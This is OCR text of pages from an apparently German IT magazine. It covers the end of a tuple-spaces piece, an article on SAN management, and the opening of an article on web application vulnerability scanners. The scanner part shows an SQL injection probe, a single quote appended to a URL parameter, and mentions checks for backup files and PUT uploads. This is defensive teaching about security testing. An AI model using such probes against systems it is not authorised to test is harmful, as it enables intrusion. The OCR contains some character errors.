Engineering im Allgemeinen 
setzt. Lediglich Bill Joys und 
David Gelernters Proklamatio- 
nen der Neunziger stellen das 
Thema nach wie vor in einen 
größeren Zusammenhang [2]. 
So gibt es auch keine Organi- 
sation, keinen Titel (etwa wie 
die Object Management Group 
mit CORBA), der die inter- 
nationalen Aktionen bündeln 
würde. Das Jini/JavaSpaces- 
Forschungsprojekt der Sun 
Labs hat diesbezüglich nie An- 
spruch erhoben. Tatsächlich 
hat es für einige Verwirrung 
gesorgt, da die Jini Communi- 
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ty auf einem anderen Abstrak- 
tionsniveau angesiedelt ist als 
die Spaces Community, was 
naturgemäß zu Dissonanzen 
geführt hat. 


Back to the Future 


Wird der Zeitreisende einen 
Neuanfang initiieren können? 
In manchen Bereichen viel- 
leicht, eher kann man jedoch 
mit Quantensprüngen durch 
die Fusion mit neuen Berei- 
chen rechnen. Hier sind etwa 
die Triple Spaces zu nennen, 
bei denen es um die Ver- 
schmelzung des semiotischen 
Dreiecks (triadische Relatio- 
nen) mit Spaces geht. Die ge- 
samte Middleware-Branche 
betreffend zeichnet sich eher 
eine behutsame, inkrementelle 
Annäherung ab. 
Space-basierte Techniken 
und Programmiermuster wer- 
den nach und nach in etablier- 
te Anwendungsserver über- 
nommen. Der Space-Effekt ist 
jedoch nur mit einer holisti- 
schen Sichtweise realisierbar. 
David Gelernter jedenfalls 
unternimmt nach wie vor 
Zeitreisen und regt in seinem 
Manifest zu Diskussionen 
über die Zukunft an [d]. (ka) 


DR. BERNHARD 
ANGERER 


ist Support Engineer bei 
GigaSpaces Technologies 
in New York. 
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SAN 


Speichernetze und 
ihre Verwaltungsinstrumente 


Gut 
eingebunden 


Mario Vosschmidt, 
Hartmut Wiehr 


Allein mit technischen Mitteln dürfte man das 
allseits beklagte Datenwachstum nicht in den 
Griff bekommen; Planung und Organisation 
gehören ebenfalls dazu. Das Management der 
Speichernetze setzt dagegen auf gegebenen - 
oftmals „historisch gewachsenen”, also 
chaotischen - Bedingungen auf, mit denen die 
IT-Mannschaft zurechtkommen muss. 
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sich das Einrichten und der 

Betrieb von Speichernetzen 
recht einfach. Voraussetzung 
ist eine vollständige und sorg- 
fältige Planung, die bereits 
weit vor dem Erwerb der Ge- 
räte beginnen muss und so- 
wohl den Anwender als auch 
den Netzwerk- und den Spei- 
cheradministrator einbindet. 
Man erlebt immer wieder, dass 
Verantwortliche die Speicher- 
erfordernisse nur nach Kapa- 
zität in Gigabytes bemessen 
und dabei die Ein-/Ausgabelast 
beziehungsweise die Trans- 
portlast des Netzes sowie die 
späteren Administrationsarbei- 
ten vollkommen außer Acht 
lassen. Eine solch ungenügen- 
de Voraussicht schlägt sich 
kurze Zeit nach der Inbetrieb- 
nahme in der Unzufrieden- 
heit der Anwender nieder, die 
sich in der Regel über Perfor- 
mance-Schwankungen und ho- 
he Antwortzeiten beklagen. Si- 
cherlich sind die Budgets für 
Speichernetze begrenzt, das 
darf aber nicht dazu führen, 
dass aus dem Sparzwang her- 
aus angeschaffte „Billig-Lö- 
sungen“ sehr bald hohe Nach- 
investitionen nach sich ziehen. 

Traditionell nutzt man seit 
etwa Ende der 90er-Jahre 
Speichernetze auf Basis von 
Fibre Channel (FC). Es ist in- 
zwischen ausgereift und im 
Vergleich zum klassischen 
LAN einfach, insbesondere 
deshalb, weil seine Transport- 
dienste wenige Konfigura- 
tionsoptionen aufweisen und 
damit die Anzahl der mög- 
lichen Fehlerquellen gering 
ist. Das SAN-Management 
besteht meist aus zwei Teilen, 
der Verwaltung des Netzes, 
das im Wesentlichen aus FC- 
Switches besteht, und der dar- 
an angeschlossenen Speicher- 
einheiten, meist über den mit 
dem Speichersystem mitgelie- 
ferten „Elementen-Manager“ 
oder die Weboberfläche. 

Die eigentliche Schwierig- 
keit bei einer FC-Implementie- 
rung liegt gewöhnlich in der 
geringen Erfahrung der Ser- 
ver- und Netzwerkadministra- 
toren mit dem Thema Daten- 
speicher. Und das, obwohl ein 


: Allgemeinen gestalten 


großer Teil der Investitionen 
der IT gerade in diesen Be- 
reich fließt. Immer wieder 
kann man feststellen, dass auf 
der Serverseite die /O-Last 
der Festplatten keine Beach- 
tung findet und keine histori- 
schen Aufzeichnungen über 
den Verlauf der Last vorhan- 
den sind. Dabei liefern alle 
Server-Betriebssysteme hinrei- 
chend Mittel, solche Daten zu 
sammeln und in Entschei- 
dungsprozesse einfließen zu 
lassen. An dieser Stelle sei an 
traditionelle Unix-Werkzeuge 
wie sar oder an Microsofts 
perfmon für Windows erinnert. 
Beide sind Bestandteil der Be- 
triebssystem-Basisinstallation 
und trotzdem wenig bekannt. 


Speichernetze 
für Groß und Klein 


NAS (Network Attached Sto- 
rage) entstand dadurch, dass 
Hersteller klassische Fileserver 
samt Speichereinheiten sowie 
Managementsoftware vorkon- 
figuriert und als integrierte Ge- 
samtlösung angeboten haben. 
Der Vorteil einer solchen Mo- 
dells liegt in der Einfachheit 
des Beschaffungsvorganges, 
die allerdings mit dem Verlust 
der Einflussmöglichkeiten auf 
Details einhergeht. Die Pro- 
dukte bestehen in der Regel 
aus einem oder mehreren spe- 
zialisierten Servern, den daran 
angeschlossenen oder darin in- 
tegrierten Speichereinheiten 
sowie aus einem oder mehre- 
ren Netzwerkdateidiensten. 
Dabei legen die Designer ihr 
Hauptaugenmerk meist auf 
die im LAN benötigten Datei- 
dienste und deren einfache 
Nutzung, die Qualität der Spei- 
chereinheiten spielt meist nur 
eine rudimentäre Rolle. 

Die Entscheidung für NAS 
fällt in der Regel aus Gründen 
des im Netz angebotenen 
reichhaltigen Funktionsum- 
fangs und nicht anhand von 
Performance- oder Qualitäts- 
ansprüchen an die Disk-Spei- 
chereinheit selbst. Eine beson- 
dere Stellung haben in diesem 
Marktsegment die NAS-Köp- 
fe, mit denen sich die Vorteile 
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beider Welten elegant verbin- 
den lassen: die Vielzahl und 
der Komfort der Netzwerk- 
dienste eines NAS-Servers mit 
der Qualität eines vollwertigen 
SAN-Speichersystems. Leider 
bezahlt man diese Eleganz mit 
einem erhöhten Verwaltungs- 
aufwand, daman NAS-Server 
und Speichersystem getrennt 
administrieren muss. 

1SCSI war das Versprechen, 
das vorhandene Wissen über 
LANs auf das Management 
von Speichernetzen zu übertra- 
gen und damit administrative 
Anstrengungen reduzieren zu 
können. Auch wäre die ge- 
meinsame Nutzung des vor- 
handenen TCP/IP-Netzes für 
die Übertragung von Daten 
zwischen den Servern und den 
Speichersystemen reizvoll. Die 
Erfahrung zeigt aber ein ande- 
res Bild: iSCSI setzt ein gut 
administriertes TCP/IP-Netz 
voraus. In der Regel fordert 
der Serveradministrator min- 
destens zwei unabhängige Da- 
tenpfade zwischen Speicher- 
system und Servern, die nicht 
mit denen zwischen Clients 
und Servern kollidieren dür- 
fen. Es sind Fälle bekannt ge- 
worden, in denen Adminis- 
tratoren versucht haben, das 
vorhandene Firmen-LAN für 
ein iSCSI-Speichernetz samt 
Failover-Funktionen zu nut- 
zen. Diese Versuche scheiter- 
ten kläglich. 

Wichtig ist es also, dem 
Schichtenmodell zu folgen 
und zunächst eine unabhängi- 
ge IP-Infrastruktur aufzubau- 
en. Darauf setzen dann der 
iSCSI-Dienst und das Spei- 
chermanagement einschließ- 
lich redundanter Kanäle und 
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Durch die Einführung neuer SAN-Übertragungstechniken verschieben sich auch die 
Prognosen hinsichtlich der Marktanteile: Mit Einzug von FCoE, SAS und Infiniband ziehen 


die Nicht-TCP/IP-basierten Techniken wieder davon (Abb. 1). 


Multipathing auf. Der Instal- 
lationsaufwand besteht zwei- 
fach, in der Bereitstellung der 
IP-Infrastruktur und der Im- 
plementierung der Speicher- 
einheiten. Damit eignet sich 
iSCSI für wenig dynamische 
Netze und für solche mit we- 
nigen Speichereinheiten, also 
eher für KMU. iSCSI umgeht 
die Investition in teure FC- 
SANs, was allerdings einen 
höheren Aufwand bei der 
Konfiguration der TCP/IP- 
iSCSI-Netze nach sich zieht, 
während sich ein FC-Switch 
in kleinen Umgebungen wie 
eine Mehrfachsteckdose be- 
treiben lässt. 

Noch einfacher gestaltet 
sich die Installation eines SAS- 
basierten (Serial Attached 
SCSD) Speichernetzes: Hier 
steckt man die Komponenten 
einfach nur zusammen. SAS- 
Switches haben inzwischen 
Marktreife erlangt, durch die 
sich Speichernetze realisieren 
lassen, deren Entfernungs- 


überbrückung im Unterschied 
zur FC-Welt allerdings auf we- 
nige Meter begrenzt ist, was 
sie für Desaster-Recovery- 
Konzepte ungeeignet macht. 


Management- 
Tohuwabohu 


Oberhalb dieser Übertragungs- 
techniken arbeiten Dienste wie 
Volume-Manager, Filesyste- 
me und natürlich Applikatio- 
nen, die entweder auf NAS- 
Systemen oder auf Servern 
laufen. Storage-Management 
beschränkt sich also nicht nur 
auf das Bereitstellen von Ka- 
pazität, sondern es sind der ge- 
samte Transport, die Lagerung 
und Verwendung der Daten zu 
berücksichtigen. 

Jeder Speichersystemher- 
steller stellt einen Elementen- 
Manager zur Verfügung, der 
die eigenen Systeme verwal- 
tet und das Zusammenspiel 
der Funktionen innerhalb und 


A-TRACT 


© Das Feld der SAN-Management-Software ist weit und genauso unübersichtlich wie die historisch 
gewachsenen Speichernetze, die sie bändigen sollen. 


@ Während Management-Suites zumindest einen für den Tagesbetrieb ausreichenden Funktions- 
umfang besitzen, sind Elementen-Manager für komplexere Installationsaufgaben und Fehler- 
isolierung nach wie vor unverzichtbar. 


© Ein zusätzliches Management-Instrument ist die Virtualisierung: Sie kann Speicherressourcen 
gleicher Servicequalität in Pools zusammenfassen und den Administrator von den Zwängen 
eines Speichersystems und seines Herstellers befreien. 
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außerhalb des Speichersys- 
tems gewährleisten soll. Re- 
präsentanten dieser Klasse 
sind zum Beispiel EMCs Na- 
visphere, IBMs Storage Ma- 
nager, SGls Santricity oder 
Suns Common Array Mana- 
ger (CAM). Diese Produkte 
verfolgen naturgemäß einen 
proprietären Ansatz und sind 
meist zwingend erforderlich, 
um alle Funktionen der Syste- 
me wie Replikationsmecha- 
nismen und Komponenten- 
überwachung bereitzustellen. 
Für die Fehlererkennung und 
-beseitigung sind sie das ein- 
zige Steuerungselement und 
in kleineren Installationen 
meist das einzige Administra- 
tionswerkzeug. 

Einige Hersteller implemen- 
tieren auf ihren Speichersyste- 
men gleich einen Webserver, 
der die Administration über ei- 
nen gewöhnlichen Browser 
ermöglicht. Insbesondere Sys- 
teme der Einstiegsklasse ver- 
folgen diesen einfachen Weg. 
Komplexere Speichersysteme 
verfügen meist über einen so 
umfangreichen Funktionssatz, 
dass sie mit eigenen APls 
ausgestattet sind, um die Ad- 
ministrations- und Überwa- 
chungsfunktionen GUI-neutral 
abbilden zu können. Unterstüt- 
zen die Systeme ein webbasie- 
rendes Management, sorgen 
Proxy-Agenten für die Über- 
setzung der API auf einen 
Webservice. Suns CAM ist 
eine solche Implementierung. 
Der Vorteil besteht darin, dass 
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SAN 


man ohne separate Software 
auf einer Admin-Station aus- 
kommt. 

Die großen Management- 
Suites nutzen entweder direkt 
die von den Herstellern ange- 
botenen APIs oder die SMI-S- 
Provider der Anbieter von 
Speicherkomponenten. Diese 
umfassen HBAs, Switches und 
Speichersysteme und in vielen 
Fällen auch Serverdienste wie 
Volume-Manager, Dateisyste- 
me oder Datenbanken. Zu den 
Vertretern dieser Klassen ge- 
hören HPs Storage Essentials, 
EMCs Control Center, CAs 
Brightstor SRM, IBMs Tivoli 
Storage Manager, BMCs Pa- 
trol und Symantecs Sanpoint 
Control. Natürlich hat dieser 
umfassende Ansatz seinen 
(Lizenz-)Preis. Der Vorteil be- 
steht in einem einzigen Kon- 
trollpunkt über eine Vielzahl 
von Produkten hinweg, zu- 
mindest für den Tagesbetrieb. 
Für komplexere Installations- 
aufgaben und Fehlerisolierung 
sind die Elementen-Manager 
nach wie vor unverzichtbar. 

Jeder Managementansatz 
verfügt über seinen eigenen 
Transportdienst. Für die web- 
basierte Verwaltung benutzen 
viele Hersteller ausschließlich 
HTTPS. Einige verwenden für 
den Elementen-Manager Re- 
mote Procedure Calls (RPC), 
die verschlüsselt über das 
Netz gehen, nachdem im Rah- 
men der Authentifizierung ein 
Session Key verhandelt wur- 
de. Neben diesen Standard- 
diensten bieten Hersteller häu- 
fig für die Fehlersuche außer 
einer seriellen RS232-Schnitt- 
stelle den Zugriff über rsh, ssh 
beziehungsweise telnet an. 

Storage-Virtualisierung ist 
ein von der IT-Industrie seit 
vielen Jahren intensiv miss- 
brauchter Begriff. Während 
die ursprüngliche Bedeutung 


ausschließlich das Abbilden 
von Speicherressourcen an die 
beteiligten Server, also LUN 
Masking beziehungsweise LUN 
Mapping war, findet man den 
Begriff heute meist im Zu- 
sammenhang von Zuweisung 
beliebiger Speicherressour- 
cen einschließlich Datenre- 
plikationsmechanismen. Ver- 
einzelt steht er auch für das 
vom Speichersystem vorge- 
nommene, außerhalb der Kon- 
trolle des Administrators lie- 
gende Verteilen von Daten 
über die vorhandenen Disks 
innerhalb eines Systems. 


Virtualisierung als 
Managementtrick 


SAN-Virtualisierung meint im 
engeren Sinn die Virtualisie- 
rung im Speichernetz selbst, 
also auf der Ebene der Switch- 
Infrastruktur [1]. Dabei sind 
wiederum zwei Ansätze zu 
unterscheiden, die sogenannte 
In-Band-Virtualisierung, bei 
der die Kontrollinstanz für die 
Datenindirektion und der Da- 
tentransport selbst auf demsel- 
ben Gerät liegen. Das begrenzt 
die Performance auf die Trans- 
portleistung des zwischen Ser- 
ver und Storage befindlichen 
Virtualisierers. Bekannte Soft- 
wareprodukte kommen von 
Falconstor und Datacore. 

Die Out-of-Band-Methode 
trennt dagegen die Kontrollin- 
stanz vom Datenpfad und nutzt 
einen redundanten Satz von 
Managementinstanzen, die den 
Datenpfad kontrollieren, und 
ebenso redundant ausgelegte 
intelligente FC-SAN-Switches, 
die die Indirektion der Daten 
im Netz bewirken. Diese Tech- 
nik bezeichnet man als „Split- 
Path Acceleration of Indepen- 
dent Datastreams“ (SPAID). 
Die Trennung der Instanzen 


führt zu einer wesentlich höhe- 
ren Skalierbarkeit. 

Eine solche Virtualisie- 
rung verfolgt meist zwei Zie- 
le. Das erste ist die Befreiung 
von den Zwängen eines Spei- 
chersystems und/oder seines 
Herstellers, das zweite die 
Bereitstellung von hersteller- 
unabhängigen Datendiensten 
wie Pool-Bildung (Zusammen- 
fassung von Speicherressour- 
cen gleicher Servicequalität), 
Datenreplikation wie Daten- 
Snapshots, Remote Mirroring, 
Disaster Tolerance und Disas- 
ter Recovery. 

Im Einsatz erlaubt das die 
granulare Auswahl des jeweils 
optimalen Speichersystems 
oder der eingesetzten Speicher- 
systeme für eine gegebene 
Aufgabenstellung. Speicher- 
ressourcen lassen sich unab- 
hängig vom System beliebig 
zur Verfügung stellen und 
dynamisch verändern. Nur für 
die Basiseinrichtung der zu 
virtualisierenden Elemente be- 
darf es noch der proprietären 
Managementapplikationen. 

Die Mehrzahl der Anwen- 
der von Virtualisierungslösun- 
gen nutzt diese im Sinne der 
Speicherverwaltung. Haupt- 
motive sind meist das Abkop- 
peln von den Produkten und 
ihrer Eigenarten sowie eine 
zentrale Verwaltung aller Spei- 
cherressourcen. Meist partitio- 
nieren die Administratoren die 
Speichersysteme bereits bei 
der Erstinstallation vollständig 
und verwalten sie danach nur 
noch über die Virtualisierung. 
Insbesondere für dynamische 
Umgebungen, zum Beispiel 
bei Service-Providern oder 
Anwendern mit einer Vielzahl 
von kleinen Applikationsinseln 
wie in der öffentlichen Ver- 
waltung, hat sich der Ansatz 
seit Jahren bewährt. Dort, wo 
eine hohe Skalierung über 


Tausende von LUNs und Hun- 
derte von Servern notwendig 
ist, kommt man ohne Split- 
Path-Technik nicht mehr aus. 

Das aus der Bluefin-Initi- 
ative stammende SMI-Gre- 
mium der SNIA hat in den 
vergangenen Jahren mehrere 
Versionen eines Management- 
standards vorgelegt. SMI-S 
(Storage Management Inter- 
face Standard) gilt inzwischen 
als allgemein anerkannt [2, 3]. 
Fast alle System- und Mana- 
gementsoftware-Anbieter un- 
terstützen die Schnittstelle. 
Insgesamt sind mehr als 200 
Produkte von etwa 30 Her- 
stellern gelistet, für die eine 
gegenseitige Integration ge- 
währleistet sein soll. 

Leider verfolgen die Spei- 
chersystemhersteller eine zwei- 
gleisige Strategie. Zum einen 
sind sie bestrebt, die Nutzung 
proprietärer Ansätze aus Dif- 
ferenzierungsgründen zu för- 
dern. Gleichzeitig wollen und 
müssen sie den Anwendern ei- 
ne langfristige Strategie für das 
unabhängige Management an- 
bieten. Der aktuelle Qualifi- 
zierungskanon fordert nur die 
Verträglichkeit von SMI-S- 
Providern, jedoch keinen zu- 
gesicherten Funktionsumfang. 
Wollen die Anwender den 
zügigen Ausbau des SMI-S- 
Funktionsumfangs, müssen sie 
dies bei den Herstellern einfor- 
dern und in den SNIA-Gre- 
mien durchsetzen. 


Kleiner Blick 
in die Glaskugel 


Neben der bisherigen Auswahl 
von Schnittstellen stellt Fibre 
Channel over Ethernet (FCoE) 
eine sinnvolle Entwicklung 
dar, da sie die Vorteile einer 
Ethernet-basierten Verkabe- 
lung und Switch-Infrastruktur 


Übertragungstechnik Durchsatz 

Fibre Channel 2, 4 oder 8 GBit/s 

iscsı 1 oder 10 GBit/s 

SAS 12 GBit/s (SAS 4x) 
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Full Duplex maximale Kabellänge Latenz Anzahl Hosts 
v je nach Glasfasertyp niedrig bis etwa 64 000 
5m-50 km 
v 15 m (106BaseCX4), hoch unbegrenzt 
100 m (Twisted Pair) 
65 m — 40 km (je nach Glasfaser) 
v 6m niedrig max. 12 


Trunking Booten übers Netz 
= v 
= v 
v v 
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integriert, ohne die Nachteile 
eines TCP/IP-Transports mit 
sich zu bringen. Allerdings 
gehen damit umfangreiche 
Neuinvestitionen einher, weil 
sich die bisherigen FC-Swit- 
ches nicht für FCoE eignen. 
Infiniband dürfte zumindest in 
HPC-artigen (High Perfor- 
mance Computing) Umge- 
bungen weitere Anwender fin- 
den: Es ermöglicht per RDMA 
(Remote Direct Memory Ac- 
cess) direkte Speicherzugriffe 
über Systemgrenzen hinweg 
und zieht ohnehin als Inter- 
Node-Connect in große Re- 
chen-Cluster ein. 

Des Weiteren zeichnen sich 
Bestrebungen ab, die Intelli- 
genz von Speichersystemen 
auf die Netzebene zu verla- 
gern, etwa die Implementie- 
rung von Diensten wie Snap- 
shots in die Switches. 

Die zusätzlichen Erforder- 
nisse an die Datenhaltung, 
getrieben durch gesetzliche 
und andere organisatorische 
Anforderungen, werden zu ei- 
ner stetigen Erweiterung des 
Speicherplatzes führen. Die 
Möglichkeiten der IT, diese 
Inflation einzudämmen, sind 
beschränkt, da sie keinen di- 
rekten Einfluss darauf hat. In 
der Regel kann sie nur reagie- 
ren. Eine ist mit Sicherheit 
Data Deduplication — wenn 
man so will, eine zusätzliche 
Methode, die Datenmenge und 
den Datenfluss in einer mehr- 
schichtigen Speichernetz-Ar- 
chitektur in den Griff zu be- 
kommen. Wesentlich mehr 
Einsparpotenzial bieten aber 
vermutlich organisatorische 
Maßnahmen, zum Beispiel 
durch den flächendeckenden 
Einsatz von Applikationen für 
Knowledge-Management und 
für regelbasierte Erstellung, 
Verwaltung und Archivierung 
von Dokumenten, Produkt- 
und Mediendaten. Die Ten- 
denz in der Speicherindustrie 
geht eindeutig in Richtung 
dieser höherwertigen Dienste, 
denn nur so sind die Datenflut 
und die Speicherarchitektur 
in den Griff zu bekommen. 
Mit solchen Ansätzen entfällt 
die Notwendigkeit des Zu- 
griffs auf Dateisysteme für den 
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Endanwender. Einer der An- 
sätze benutzt ein Object Store, 
wie ihn zum Beispiel Sun auf 
der ST5800 (Honeycomb) an- 
bietet. 

Ebenso wird man in naher 
Zukunft eine Differenzierung 
von Datenschutz (Data Pro- 
tection, RAID) und Datenma- 
nipulation (Snapshots, Mirror, 
Storage Pooling) sehen, also 
die Abkehr vom klassischen 
Speichersystem mit proprie- 
tären, vollständig integrierten 
Datendiensten hin zu noch 
mehr Modularität. Wie oder 
ob irgend jemand diese modu- 
lare, heterogene Landschaft 
effektiv mit den heutigen Ma- 
nagementmethoden kontrol- 
lieren und steuern kann, ist 
eine andere Frage. (sun) 
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Webscanner 


ri er 


ie Nutzung von Web- 
D anwendungen ist heut- 

zutage für Unterneh- 
men wie Privatpersonen eine 
Selbstverständlichkeit — was 
ihre Attraktivität für Hacker 
enorm erhöht. Der Diebstahl 
von Kreditkarten- und ande- 
ren vertraulichen Informatio- 
nen ist ein rentables Geschäft. 
Da die Angriffe auf der An- 
wendungsebene, also inner- 
halb zugelassener Protokolle, 
stattfinden, können klassische 
Netzwerk-Firewalls die Web- 
anwendungen nicht schützen 
(Abb. 1). 

Ein Angreifer benötigt nicht 
einmal spezielle Hackerwerk- 
zeuge, lediglich einen Brow- 
ser. Mit unterschiedlichen 
Methoden (siehe Kasten „Die 
verschiedenen Angriffstech- 
niken“) kann er einer An- 
wendung beispielsweise alle 
Kundendaten entlocken. Als 
Hauptursache für das Entste- 
hen von Schwachstellen gilt 
der Kosten- und Zeitdruck, un- 
ter dem Anwendungen in der 
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Regel entwickelt werden müs- 
sen. Beim Entwicklungspro- 
zess steht folglich das Funktio- 
nieren und nicht die Sicherheit 
im Vordergrund. 


Über erlaubte 
Kanäle 


Klassische Firewalls blockie- 
ren alle Zugriffe auf den Web- 
server, außer auf den Dienst 
selbst. Angriffe auf Appli- 
kationsebene verhindern sie 
nicht, da sich diese in erlaub- 
ten Anfragen verstecken. Die- 
ser Gefahr, auch als ‚‚Port-80- 
Problem“ bekannt, kann man 
mit sogenannten Webappli- 
kations-Firewalls (WAF) be- 
gegnen [1]. Sie analysieren 
auf der Anwendungsebene 
sowohl die eingehenden An- 
fragepakete an den Webser- 
verdienst, als auch dessen aus- 
gehende Antworten. Auf die 
Art sollen sie sicherstellen, 
dass keine bösartigen Anfra- 
gen an den Dienst gelangen 


und er keine vertraulichen 
Daten zurückliefert. 
Alternativ kann man ver- 
suchen, die Ursache zu behe- 
ben. Sie liegt meist in den 
Webanwendungen selbst. Da- 
mit Programmierer bei der 
Entwicklung erst gar keine 
Schwachstellen entstehen las- 
sen, sollten sie rechtzeitig 
durch Schulungen sensibili- 
siert und motiviert werden, auf 
Sicherheitsaspekte zu achten. 
Zusätzlich gilt es, während 
und nach dem Entwicklungs- 
prozess Anwendungen auf 
Schwachstellen zu prüfen. Da- 
bei unterstützen regelmäßige 
Sourcecode-Reviews sowie 
spezielle Werkzeuge, soge- 
nannte Webapplikations-Scan- 
ner. Keine der beschriebenen 
Maßnahmen alleine schützt 
umfassend vor Angriffen auf 
Webanwendungen, sinnvoll 
ist daher eine Kombination 
aus ihnen. 
Webapplikations-Scanner 
funktionieren völlig anders als 
klassische Schwachstellen- 


Schwachstellen in Webapplikationen finden 


Lückensuche 


Steffen Tröscher 


Mit speziellen Scannern kann man Schwachstellen in 
Webanwendungen identifizieren. Wie solche Scanner 
funktionieren und welche es gibt, zeigt ein Vergleich. 


Scanner wie Nessus oder seine 
kommerziellen Verwandten. 
Letztere prüfen lediglich auf 
der Netzwerkebene auf be- 
kannte Schwachstellen in Stan- 
dardsoftware, beispielsweise 
Buffer-Overflow-Lücken in 
einem Windows-Netzwerk- 
dienst. Webapplikations-Scan- 
ner hingegen suchen nach in- 
dividuellen Schwachstellen 
auf der Anwendungsebene 
(siehe Abbildung 2). Ein sol- 
cher Scan erfolgt prinzipiell 
in zwei Schritten — dem auto- 
matischen Erfassen der Web- 
anwendung und der eigent- 
lichen Schwachstellensuche. 

Die meisten Scanner kön- 
nen neben klassischen Weban- 
wendungen auch Webservices 
auf Schwachstellen überprü- 
fen. Dazu braucht der Scanner 
lediglich eine WSDL-Datei 
(Web Services Description 
Language), mit deren Hilfe er 
auf den Webservice zugreifen 
kann. Bis auf ein paar XML- 
spezifische Ausnahmen sind 
in Webservices prinzipiell 
die gleichen Schwachstellen 
zu finden wie in Webanwen- 
dungen. 


Automatisierte 
Erfassung 


Damit ein Scanner eine Web- 
anwendung untersuchen kann, 
muss er zuerst die komplette 
Anwendung erfassen. Diesen 
Vorgang nennt man auch 
„Crawlen‘“. Dabei versucht er, 
alle innerhalb der Anwendung 
vorhandenen Links und deren 
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Parameter ausgehend von ei- 
ner Startseite automatisch zu 
identifizieren. In der Praxis 
erschweren Web-2.0-Techni- 
ken wie Ajax, Javascript oder 
Flash das jedoch. 

Eine Ajax-Anwendung stellt 
beispielsweise im Hintergrund 
Anfragen an den Webserver, 
ohne dass der Benutzer dazu 
einen Link anklicken muss. 
Ein Scanner sollte also in der 
Lage sein, während des Craw- 
lens diese Ajax-Aufrufe auszu- 
lösen, um im zweiten Schritt 
Schwachstellen in deren Ab- 
wicklung zu identifizieren. 

Zudem kann eine Anwen- 
dung mithilfe von Javascript 
dynamisch Links generieren. 
Damit ein Webapplikations- 
Scanner sie ebenfalls findet, 
muss er Javascript-Code parsen 
können. Es gibt eine Vielzahl 
weiterer Methoden, mit denen 
ein Entwickler Link-Struktu- 
ren in einer Webanwendung 
erzeugen kann. Ein Beispiel 
dafür sind in Flash program- 
mierte Applikationen. Ein 
Scanner sollte ebenfalls in 
der Lage sein, deren Links zu 
finden. 


Benutzereingaben 
vordefinieren 


Es finden sich jedoch immer 
wieder Anwendungen, die ein 
Scanner nicht komplett auto- 
matisiert erfassen kann. Für 
solche Fälle bieten die meis- 
ten Programme die Option der 
manuellen Erkundung. Aus- 
gehend von einer Startseite 
kann der Auditor in einem 
Browser innerhalb des Scan- 


Angreifer 


Netzwerk-Firewall 


Webserver 


Netzwerk-Firewall 


Klassische Schutzmaßnahmen wie Firewalls richten nichts mehr aus, wenn die Angriffe 
über erlaubte Kanäle, in diesem Fall die Webanwendung selbst, kommen (Abb. 1). 


ners die zu prüfenden Links 
manuell anklicken. 

Eine weitere Hürde bei der 
Erfassung von Link-Struktu- 
ren sind Benutzereingaben. 
Beispielsweise soll in einer 
Versicherungsapplikation der 
Kunde über das Formular 
adressaenderung.jsp Ände- 
rungen vornehmen können. 
Damit er auf dieses Formular 
Zugriff erhält, prüft die An- 
wendung vorab auf einer wei- 
teren Seite pruefung.jsp, ob er 
eine gültige Kundennummer 
vorweisen kann. Um nun die 
Formularseite adressaende- 
rung.jsp automatisiert erfas- 
sen zu können, muss auch der 
Scanner innerhalb der entspre- 
chenden Seite eine gültige 
Kundennummer angeben. 

Die meisten Scanner-Pro- 
dukte umschiffen diese Klip- 
pe, indem der Benutzer für 
bestimmte GET- und POST- 
Parameter vordefinierte Wer- 
te hinterlegen kann, die die 
Software automatisch beim 
Crawlen der Anwendung ein- 
setzt. Alternativ kann man 
solche Anwendungen manuell 
erkunden. 

Folgt ein Applikations- 
Scanner ausgehend von einer 
Startseite rekursiv allen Links, 
kann sich dieser Vorgang the- 
oretisch fast unendlich über 
eine Vielzahl von Webanwen- 


A-TRACT 


© Webapplikations-Scanner suchen im Unterschied zu 
„normalen“ Schwachstellenscannern nach individuellen 
Lücken einzelner Webanwendungen. 


© Die aufgeführten Produkte können viele Schwachstellen 
effizient aufdecken, ersetzen jedoch nicht die manuelle 
Überprüfung einer Applikation. 


© Bei der Auswahl eines Scanners ist es empfehlenswert, 
eine eigene Evaluation vorzunehmen. Der Käufer in spe 
sollte ausprobieren, welches Produkt am besten zu seinen 
zu prüfenden Webanwendungen passt. 
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Die speziellen Webapplikations-Scanner setzen eine Ebene 
höher an als klassische Schwachstellenscanner, die lediglich 
auf Netzwerkebene nach bekannten Lücken in Standard- 


software suchen (Abb. 2). 


dungen erstrecken. Um das zu 
begrenzen, bieten die Scan- 
Programme die Option, den 
Prozess auf bestimmte Hosts, 
Verzeichnis-Bäume, Dateien 
oder Dateitypen zu beschrän- 
ken. Das kann der Anwender 
jeweils per Whitelist mit Soll- 
Werten oder per Blacklist mit 
Ausschlusswerten steuern. Er- 
fasst der Scanner dabei eine 
URL mehrfach, kann es durch- 
aus sinnvoll sein, die Anzahl 
der wiederholten Erkundun- 
gen zu limitieren. 


Wie die Scanner 
arbeiten 


Bei der Schwachstellensuche 
stellt der Webapplikations- 
Scanner manipulierte Anfra- 
gen an den Webserver, um 
eine Fehlerreaktion zu provo- 
zieren. Er verändert automa- 
tisch im ersten Schritt die er- 
fassten Links inklusive aller 
Parameter und schickt sie an 
den Webserver. Die Antwor- 
ten des Servers dienen der 
Erkennung sowie Kategori- 
sierung von Schwachstellen. 

Hier das Beispiel einer 
einfachen SQL-Injection- 
Schwachstelle: Beim Erkun- 
den der Anwendung erkannte 
der Scanner den Link http:// 
www .anwendung.demo/index. 


aspx?id=10. Er hängt an den 
Parameter ein SQL-Fragment, 
beispielsweise ein Single-Quo- 
te an (.../index.aspx?id=10') 
und schickt diese Anfrage an 
den Webserver. Enthält die 
Antwortseite eine Fehlermel- 
dung (etwa [SQL Server] Öff- 
nendes Anführungszeichen vor 
der Zeichenfolge ’), so erkennt 
der Scanner, dass die Web- 
anwendung einen Parameter 
nicht ausreichend prüft, bevor 
sie ihn in einem SQL-Befehl 
verwendet. Somit deutet alles 
auf das Vorhandensein einer 
SQL-Injection-Schwachstelle 
hin. 

Neben dem Provozieren 
von Fehlermeldungen suchen 
Webapplikations-Scanner auch 
Verzeichnisse, die nicht in der 
Anwendung verlinkt sind, oder 
nach „versteckten“ Dateien 
und Sicherungsdateien wie in- 
dex.aspx.bak, die vertrauliche 
Informationen preisgeben kön- 
nen. Je nach Machart finden 
weitere Prüfungen, auch auf 
der Diensteebene, statt. Unter 
anderem prüfen die Scanner, 
welche HTTP-Methoden ein 
Webserver unterstützt, und ob 
man beispielsweise mithilfe 
der PUT-Methode Dateien auf 
den Server hochladen kann. 

Nach welchen Schwach- 
stellen einer Anwendung ge- 
sucht werden soll, kann der 
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Webscanner 


Benutzer üblicherweise an- 
hand einer Liste vordefinierter 
Prüfungen in einem Regelwerk 
